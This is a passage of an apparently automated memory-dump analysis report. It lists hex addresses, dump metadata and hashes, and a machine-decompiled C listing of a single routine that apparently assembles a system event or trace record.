0x0384ff69
0x0384ff6b
0x038a5f8c
0x038a5f92
0x038a5f92
0x038a5f8c
0x0384ff74
0x0384ff77
0x0384ff7b
0x038a5f99
0x038a5f9b
0x0384ff81
0x0384ff81
0x0384ff83
0x0384ff83
0x0384ff88
0x0384ff8b
0x0384ff90
0x0384ff92
0x0384ff92
0x0384ff9c
0x0384ffa2
0x0384ffa6
0x0384ffaa
0x0384ffad
0x0384ffb2
0x038a5fa4
0x038a5faa
0x038a5faa
0x038a5fa4
0x0384ffb8
0x00000000
0x0384ffb8
0x0384ff5b
0x03850054
0x038a5f3e
0x038a5f3e
0x0384ff09
0x00000000
0x00000000
0x0384ff0f
0x0384ff14
0x038a5f47
0x038a5f4d
0x038a5f4d
0x038a5f47
0x0384ff1c
0x03850046
0x03850076
0x03850078
0x00000000
0x03850048
0x03850048
0x0385004a
0x0385004a
0x00000000
0x0385004a
0x0384ff22
0x0384ff22
0x0384ff26
0x038a5f56
0x038a5f5c
0x038a5f5c
0x038a5f56
0x0384ff2e
0x00000000
0x0384ff34
0x0384ff36
0x038a5f65
0x0384ff3c
0x0384ff3c
0x0384ff3c
0x0384ff3e
0x00000000
0x0384ff3e
0x0384ff2e
0x0384ff1c
0x0384fef3
0x0384fee3
0x0384f9f9
0x0384f9f9
0x0384f9fb
0x0384f9ff
0x0384fbd5
0x038a5fb1
0x038a5fb1
0x0384fbdf
0x00000000
0x0384fbe5
0x0384fbe5
0x0384fbe8
0x0384fbed
0x038a5fdf
0x0384fc01
0x0384fc01
0x0384fc04
0x0384fc09
0x038a5fee
0x038a5ff4
0x038a5ff4
0x038a5fee
0x0384fc0f
0x0384fc13
0x0384fc1d
0x0384fc20
0x0384fc23
0x0384fc26
0x0384fc2b
0x038a5ffd
0x038a6003
0x038a6003
0x038a5ffd
0x0384fc33
0x00000000
0x0384fc39
0x0384fc3b
0x0384fc3e
0x0384fc41
0x0384fc46
0x038a600c
0x038a6012
0x038a6012
0x038a600c
0x0384fc4e
0x00000000
0x0384fc54
0x0384fc54
0x0384fc59
0x038a601b
0x038a6021
0x038a6021
0x038a601b
0x0384fc61
0x00000000
0x0384fc67
0x0384fc6a
0x0384fc6f
0x038a602a
0x038a6030
0x038a6030
0x038a602a
0x0384fc77
0x00000000
0x0384fc7d
0x0384fc7f
0x0384fc81
0x0384fc85
0x0384fc87
0x0384fc87
0x0384fc8c
0x0384fc8f
0x0384fc94
0x038a6039
0x0384fc9c
0x0384fca4
0x0384fcaa
0x0384fcaf
0x038a6046
0x0384fcbd
0x0384fcbf
0x038a606d
0x038a6073
0x038a6073
0x038a606d
0x0384fcc8
0x0384fccd
0x0384fccf
0x0384fcd3
0x0384fcd5
0x0384fcd5
0x0384fcde
0x0384fce1
0x0384fce3
0x0384fce3
0x0384fce8
0x0384fcf0
0x0384fcf2
0x0384fcf5
0x0384fcf7
0x0384fcff
0x0384fd02
0x0384fd06
0x0384fd11
0x0384fd14
0x0384fd17
0x038a607c
0x038a6082
0x038a6082
0x038a607c
0x0384fd1f
0x00000000
0x0384fd25
0x0384fd28
0x0384fd2d
0x038a608b
0x038a6091
0x038a6091
0x038a608b
0x0384fd35
0x00000000
0x0384fd3b
0x0384fd3e
0x0384fd43
0x038a609a
0x03850016
0x03850018
0x00000000
0x0385001a
0x0385001a
0x0384fd82
0x0384fd84
0x038a60d9
0x038a60df
0x038a60df
0x038a60d9
0x0384fd8d
0x0384fd95
0x0384fd98
0x0384fd9d
0x038a60e8
0x00000000
0x00000000
0x038a60ee
0x00000000
0x0384fda3
0x0384fda3
0x0384fda5
0x0384fe8b
0x0384fe90
0x0384fe95
0x038a60f7
0x038a60fd
0x038a60fd
0x038a60f7
0x0384fe9d
0x00000000
0x0384fea3
0x0384fea5
0x038a6106
0x0384feab
0x0384feab
0x0384feab
0x0384feb2
0x0384feb5
0x00000000
0x0384feb5
0x0384fe9d
0x0384fdab
0x0384fdad
0x038a610f
0x038a6115
0x038a6115
0x038a610f
0x0384fdb6
0x0384fdbb
0x038a611e
0x038a6120
0x0384fdc1
0x0384fdc1
0x0384fdc5
0x0384fdc5
0x0384fdc7
0x0384fdcc
0x0384fdce
0x0384fdce
0x0384fdd6
0x0384fdd8
0x00000000
0x0384fdd8
0x0384fd9d
0x03850018
0x038a60a0
0x038a60a0
0x0384fd4b
0x00000000
0x00000000
0x0384fd51
0x0384fd56
0x038a60a9
0x038a60af
0x038a60af
0x038a60a9
0x0384fd5e
0x0384febf
0x038a60b8
0x0384fec5
0x0384fec5
0x0384fec5
0x0384fec7
0x00000000
0x0384fd64
0x0384fd64
0x0384fd68
0x038a60c1
0x038a60c7
0x038a60c7
0x038a60c1
0x0384fd70
0x00000000
0x0384fd76
0x0384fd78
0x038a60d0
0x0384fd7e
0x0384fd7e
0x0384fd7e
0x0384fd80
0x00000000
0x0384fd80
0x0384fd70
0x0384fd5e
0x0384fd35
0x0384fd1f
0x038a604c
0x038a604c
0x0384fcb7
0x0384ffc0
0x0384ffc3
0x0384ffc6
0x0384ffcb
0x038a6055
0x038a605b
0x038a605b
0x038a6055
0x0384ffd3
0x00000000
0x0384ffd9
0x0384ffdb
0x038a6064
0x0384ffe1
0x0384ffe1
0x0384ffe1
0x0384ffe3
0x0384ffe7
0x0384ffed
0x00000000
0x0384ffed
0x0384ffd3
0x00000000
0x0384fcb7
0x038a603f
0x0384fc9a
0x00000000
0x0384fc9a
0x0384fc77
0x0384fc61
0x0384fc4e
0x0384fc33
0x038a5fe5
0x038a5fe5
0x0384fbf5
0x00000000
0x00000000
0x00000000
0x00000000
0x0384fbf5
0x0384fbdf
0x0384fa05
0x0384fa05
0x0384fa0a
0x0384fe14
0x038a5fb8
0x038a5fb8
0x0384fe1e
0x00000000
0x0384fe24
0x00000000
0x0384fe24
0x0384fe1e
0x0384fa10
0x0384fa10
0x0384fa15
0x0384fe29
0x0384fe2d
0x0384fe35
0x0384fe38
0x0384fe3b
0x038a5fc1
0x00000000
0x00000000
0x038a5fc7
0x0384fe43
0x0384fe45
0x00000000
0x00000000
0x0384fe4b
0x0384fe50
0x038a5fd0
0x038a5fd6
0x038a5fd6
0x038a5fd0
0x0384fe5d
0x0384fe60
0x00000000
0x0384fe60
0x0384fe41
0x0384fe41
0x00000000
0x0384fa1b
0x0384fa1b
0x0384fa1d
0x0384fa20
0x00000000
0x0384fa20
0x0384fa15
0x0384f9ed
0x0384f9ed
0x00000000
0x0384f9ed
0x0384f9cd
0x0384f9ba
0x0384f9ba
0x00000000
0x0384f9ba
0x0384fba8
0x0384fb65
0x0384fb1d
0x0384fb23
0x0384fb26
0x00000000
0x0384fb26
0x0384faf3
0x0384faf3
0x00000000
0x0384faf3
0x0384fab4
0x0384fa79
0x0384fa56
0x0384fa56
0x00000000
0x0384fa56
0x0384f94d
0x0384f950
0x0384f955
0x038a5e79
0x038a5e7f
0x038a5e7f
0x038a5e79
0x0384f95b
0x0384f960
0x038a5e88
0x038a5e8a
0x038a5e8a
0x038a5e8e
0x038a5e93
0x00000000
0x038a5e99
0x038a5e9c
0x038a5e9f
0x038a5ea1
0x038a5ea3
0x038a5ea3
0x038a5ea7
0x00000000
0x038a5ea7
0x0384f966
0x0384f966
0x0384f96b
0x038a5eb0
0x038a5eb6
0x038a5eb6
0x038a5eb0
0x0384f973
0x0384fbc7
0x0384f9a5
0x0384f9a5
0x00000000
0x0384f979
0x0384f97d
0x0384f97f
0x038a5ebf
0x038a5ec5
0x038a5ec5
0x038a5ebf
0x0384f987
0x00000000
0x0384f98d
0x0384f98d
0x0384f990
0x0384f994
0x0384f997
0x0384f99f
0x0384fff7
0x03850061
0x03850064
0x0385006a
0x038a5ece
0x038a5ed0
0x038a5ed0
0x00000000
0x03850064
0x0384fffd
0x03850000
0x00000000
0x03850006
0x038a5ecc
0x00000000
0x038a5ecc
0x03850000
0x00000000
0x0384f99f
0x0384f987
0x0384f973

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
Instruction ID: a261f1c2b6306e42df4b6c6da68d85a78a2253d23bcb94d6faadd23d78913729
Opcode Fuzzy Hash: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
Instruction Fuzzy Hash: D962E532A0476E9BDF21CEE8844036AFBA4AF55718F2D81EDDD95EB646D331D881C780

Uniqueness

Uniqueness Score: -1.00%

Function 03915BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E03915BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x3921178);
				E0389D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E03914C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0388D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E03915542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x39360e8;
								if( *0x39360e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x39360e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E03889710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E03886DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0388F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0388F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0388F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0388FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0388FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0388F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0388F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E03914CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0389D130(_t427, _t494, _t511);
				}
			}

0x03915ba5
0x03915baa
0x03915baf
0x03915bb4
0x03915bb6
0x03915bbc
0x03915bbe
0x03915bc4
0x03915bcd
0x03915bd3
0x03915bd6
0x03915bdc
0x03915be0
0x03915be3
0x03915beb
0x03915bf2
0x03915bf8
0x03915bfe
0x03915c04
0x03915c0e
0x03915c18
0x03915c1f
0x03915c25
0x03915c2a
0x03915c2c
0x03915c32
0x03915c3a
0x03915c3f
0x03915c42
0x03915c48
0x03915c5b
0x03915c5b
0x03915c2c
0x03915cb7
0x03915cb9
0x03915cbf
0x03915cc2
0x03915cca
0x03915ccb
0x03915ccb
0x03915cd1
0x03915cd7
0x03915cda
0x03915ce1
0x03915ce4
0x03915ce7
0x03915ced
0x03915cf3
0x03915cf9
0x03915cff
0x03915d08
0x03915d0a
0x03915d0e
0x03915d10
0x00000000
0x00000000
0x03915d16
0x03915d1a
0x00000000
0x00000000
0x03915d20
0x03915d22
0x03915d25
0x03915d2f
0x03915d2f
0x03915d33
0x03915d3d
0x03915d49
0x03915d4b
0x00000000
0x00000000
0x03915d5a
0x03915d5d
0x03915d60
0x00000000
0x00000000
0x03915d66
0x03915d69
0x00000000
0x00000000
0x03915d6f
0x03915d6f
0x03915d73
0x03915d79
0x03915d7f
0x03915d86
0x03915d95
0x03915d98
0x03915dba
0x03915dcb
0x03915dce
0x03915dd3
0x03915dd6
0x03915dd8
0x03915de6
0x03915dec
0x03915dee
